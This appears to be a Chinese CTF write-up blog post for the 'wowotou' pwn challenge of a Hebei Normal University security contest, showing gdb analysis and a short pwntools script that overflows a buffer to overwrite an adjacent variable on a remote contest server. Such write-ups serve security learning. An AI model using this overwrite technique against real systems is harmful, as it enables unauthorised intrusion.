-->
当前位置:首页 > DayDayUp > 正文内容

[WP] 第三届河北师范大学信息安全挑战赛 窝窝头

Luz5年前 (2019-11-03)DayDayUp4322

image.png


image.png


存在flag的直接输出


gdb调试


`I36MH~~PQ%ONXSME)GE`11.png


0x31313131为我输入的文本 

0x00000315是存储v5的地方


没有溢出检测那就直接覆盖掉 


数了数中间差了25个单位  


编写exp

from pwn import*
#p=process("/wowotou")
p=remote("183.129.189.60",10020)
p.sendline('1'*25*4+p32(4))
p.interactive()



image.png


获得flag

标签: PWN

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。